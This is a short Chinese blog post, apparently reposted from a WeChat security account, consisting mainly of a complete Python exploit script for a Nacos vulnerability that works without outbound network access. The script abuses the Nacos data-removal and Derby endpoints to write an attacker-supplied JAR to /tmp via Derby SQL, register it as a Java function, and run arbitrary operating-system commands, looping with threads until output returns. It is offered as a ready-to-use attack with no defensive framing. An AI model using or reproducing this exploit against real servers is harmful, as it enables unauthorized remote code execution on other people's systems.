Nacos 0day 不出网利用脚本

0x01 前言

昨天就有朋友问到不出网的打法，今天看到了有人提到了用
SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE来写入文件。

0x02 分析与利用

写好jar，将其放到当前目录，运行脚本会读取jar并写到目标/tmp目录，创建UDF函数并执行。
目录可根据情况更改。

import random
import sys
import requests
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor, as_completed

def execute_task(target, command, jar_hex, removal_url, derby_url, id, random_filename):
    # SQL 语句，用于将本地读取的JAR包数据写入数据库
    post_sql = f"""
    CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE('values cast(X''{jar_hex}'' as blob)', '/tmp/{random_filename}', ',', '"', 'UTF-8', '/tmp/{random_filename}.jar')
    CALL SQLJ.INSTALL_JAR('/tmp/{random_filename}.jar', 'APP.{id}', 0)
    CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'APP.{id}')
    CREATE FUNCTION S_EXAMPLE_{id}(PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'
    """
    
    option_sql = f"UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{command}')"
    get_sql = f"SELECT * FROM (SELECT COUNT(*) AS b, S_EXAMPLE_{id}('{command}') AS a FROM config_info) tmp /*ROWS FETCH NEXT*/"

    files = {'file': post_sql}
    post_resp = requests.post(url=removal_url, files=files)
    post_json = post_resp.json()
    
    if post_json.get('message', None) is None and post_json.get('data', None) is not None:
        get_resp = requests.get(url=derby_url, params={'sql': get_sql})
        return get_resp.text
    return None

def exploit(target, command, jar_file_path, max_workers=5):
    removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal')
    derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')

    # 读取本地JAR包数据
    with open(jar_file_path, 'rb') as jar_file:
        jar_data = jar_file.read()
    
    # 将JAR包数据转换为十六进制字符串
    jar_hex = jar_data.hex()

    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        while True:
            futures = []
            for i in range(max_workers):  # 每次提交 max_workers 个任务
                id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 8))
                random_filename = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', 8))
                futures.append(executor.submit(execute_task, target, command, jar_hex, removal_url, derby_url, id, random_filename))
            
            for future in as_completed(futures):
                result = future.result()
                if result:
                    print(result)
                    executor.shutdown(wait=False)
                    return  # 找到有效结果后退出

if __name__ == '__main__':
    target = 'http://127.0.0.1:8848'
    command = 'whoami'
    jar_file_path = 'download.jar'  # 替换为你的默认JAR包文件路径
    target = input('请输入目录URL，默认：http://127.0.0.1:8848：') or target
    command = input('请输入命令，默认：whoami：') or command
    jar_file_path = input('请输入JAR包文件路径，默认：download.jar：') or jar_file_path
    exploit(target=target, command=command, jar_file_path=jar_file_path)

原文始发于微信公众号（小黑说安全）：Nacos 0day 不出网利用脚本